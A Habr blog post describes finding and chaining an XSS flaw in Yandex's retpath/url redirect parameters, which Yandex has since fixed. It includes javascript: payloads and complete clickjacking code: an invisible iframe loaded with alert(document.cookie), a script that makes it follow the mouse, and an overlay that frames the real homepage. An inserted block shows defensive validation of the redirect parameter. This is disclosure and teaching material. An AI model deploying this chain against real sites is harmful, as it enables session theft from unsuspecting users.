
Spin XSS on Yandex (fixed)





Hello, Habrazhiteli!



Today I was browsing the web and went to Yandex to check the weather in the capital. When I clicked the “other city” button, Yandex redirected me here. I think everyone who sees such an address feels the urge to swap out one of the parameters, namely retpath. :) I put the standard

    "><script>alert('xss');</script>

in there and looked at the source to see what is filtered and what is not. Here is the line in the source:

    <span onclick="return {'b\-form\-button':{name:'b\-form\-button', 'retpath': &quot;\&quot;&gt;&lt;script&gt;alert('xss')&quot;}}"

Well, I thought, boring: everything is filtered. Then I looked more closely and realized that Yandex does not prepend a protocol to the URL, so there is room to play here. I entered

    javascript: alert('xss');

and it works! Unfortunately, only when you click the "Return" button. You can try it. Already more interesting, so let's dig further...






(The material is written and provided for educational purposes.)



So, what needs to be done so that the user does not realize he is clicking “Return”? Right: put this page in an iframe, add styles, and position it transparently over some element on our page. We try the frame approach, and it does not work. Yandex checks whether its site has been opened inside a frame and redirects the parent window (the browser) to Yandex. How to get around this? I found the sandbox attribute for iframe, introduced only in HTML5. It simply forbids redirecting the user, but this only worked in Chrome, and even then it blocked the contents of the entire frame.



My mood had already begun to sour, and I decided to look for other places where retpath is used, because if a similar vulnerability exists in one place, it will exist in another. I found a couple in “Dictionaries” and “Help”, but there was no “Return” button there. Then, because I had changed the parameter incorrectly, Yandex sent me here, and this is where it all started.



So, try changing the url parameter to

    javascript:alert('ahoy!');

and click the link. It works! Now we try placing the vulnerable address in an iframe. Hooray! There are no checks. Try it. Great, moving on.
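The root cause of both findings above is the same: a scheme-less retpath/url value is accepted and emitted as-is, and the warning page can be framed. As an added example (not Yandex's code and not from the original post), here is how a redirect endpoint can validate such a parameter and answer with anti-framing headers; the host allowlist and the BASE origin are assumed values.

```javascript
// Added example: server-side handling of a "return path" parameter (retpath / url).
// Not Yandex's code; the host allowlist and BASE origin are assumed values.
const BASE = "https://yandex.ru/";
const ALLOWED_HOSTS = new Set(["yandex.ru", "www.yandex.ru"]);

// Returns a normalised absolute URL that is safe to use in a link or a
// Location header, or null if the value must be discarded.
function safeRetpath(raw) {
  if (typeof raw !== "string") return null;
  // Drop ASCII control characters and surrounding whitespace: browsers ignore
  // them inside a scheme, so "\tjava\nscript:" would still run as javascript:.
  const cleaned = raw.replace(/[\u0000-\u001F\u007F]/g, "").trim();
  if (cleaned === "") return null;
  let u;
  try {
    // Resolving against our own origin turns "/weather" into a full URL and
    // makes protocol-relative "//evil.example" show its real host.
    u = new URL(cleaned, BASE);
  } catch (e) {
    return null;
  }
  // Only http(s): this single check rejects javascript:, data:, vbscript:, etc.
  if (u.protocol !== "https:" && u.protocol !== "http:") return null;
  // Only our own hosts: rejects open redirects to third parties.
  if (!ALLOWED_HOSTS.has(u.hostname)) return null;
  // The serialised form is percent-encoded, so <, > and " cannot break markup.
  return u.href;
}

// Builds the redirect response for the "Return" / warning page: never redirects
// to untrusted input, and forbids framing so the page cannot be clickjacked.
function redirectResponse(rawRetpath) {
  const target = safeRetpath(rawRetpath) || BASE;
  return {
    status: 302,
    headers: {
      Location: target,
      "X-Frame-Options": "DENY",
      "Content-Security-Policy": "frame-ancestors 'none'",
    },
  };
}

// Constructed inputs, including the payloads from the write-up.
for (const v of ["javascript:alert('xss');", " javascript: alert('xss');",
                 "//evil.example/", "/pogoda/moscow", "https://www.yandex.ru/"]) {
  console.log(JSON.stringify(v), "->", safeRetpath(v));
}
```

The same check belongs in front of every place that reflects retpath into an href, not only the redirect itself.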



Now we need to add the necessary styles to the iframe. I decided to do it like this: put the iframe with the vulnerability inside a small (100x20) div, and shift the iframe so that the user sees only the link (the one that has to be clicked).



    <!DOCTYPE html>
    <html>
    <head>
    <style type="text/css">
        body { margin: 0; padding: 0; }
        #helper { position: absolute; overflow: hidden; width: 200px; height: 13px; }
        #ifr { position: relative; top: -180px; left: -58px; }
    </style>
    </head>
    <body>
    <div id="helper">
        <div style="width: 100%; height: 300px">
            <iframe id="ifr" src="http://yandex.ru/redir_warning/?url=javascript:alert(document.cookie)" width="1000px" height="300" frameborder="no" scrolling="no"></iframe>
        </div>
    </div>
    </body>
    </html>




Done, but somehow boring! I would like the user to suspect nothing at all. How to do it? An interesting question. The first thing that came to mind: what if we move the helper element along with the mouse? Then the user no longer needs to click in a particular place; wherever he clicks, the script will execute. Here is the code:

    var el;
    window.onload = function() {
        var ifr = document.getElementById("ifr");
        // WebKit-based browsers need a slightly different vertical offset
        if (navigator.userAgent.toLowerCase().indexOf("webkit") != -1) {
            ifr.style.top = "-180px";
        } else {
            ifr.style.top = "-190px";
        }
        el = document.getElementById("helper");
        window.onmousemove = onmove;
    }
    // keep the helper element under the mouse pointer
    function onmove(e) {
        el.style.left = (e.pageX - 50) + "px";
        el.style.top = (e.pageY - 12) + "px";
        return false;
    }


And we will open a large, visible iframe with the Yandex main page, so that the user thinks he is still there. :)

 <iframe id="yandex" src="http://yandex.ru/" width="100%" height="100%" frameborder="no"></iframe> 


Good! Yandex allows its main page to be opened inside a frame.



We change the z-index of the elements, make our helper invisible, and add an extra transparent DIV that covers the Yandex iframe and avoids conflicts between the iframes.



    <div id="overlay"></div>


    #helper { z-index: 20000; opacity: 0; }
    #yandex { z-index: 10; }
    #overlay { position: absolute; top: 0; left: 0; width: 100%; height: 100%; z-index: 20; }




Finished example.

How does it work?

(following the links executes alert(document.cookie))



I hope you enjoyed my article. I would be glad to hear your comments.



At 20:30 the vulnerability was closed. I am very glad for Yandex that vulnerabilities get fixed so quickly. This came from Yandex by mail:



(the text of the letter did not survive extraction; only its link to http://help.yandex.ru/ remains)

Source: https://habr.com/ru/post/126800/


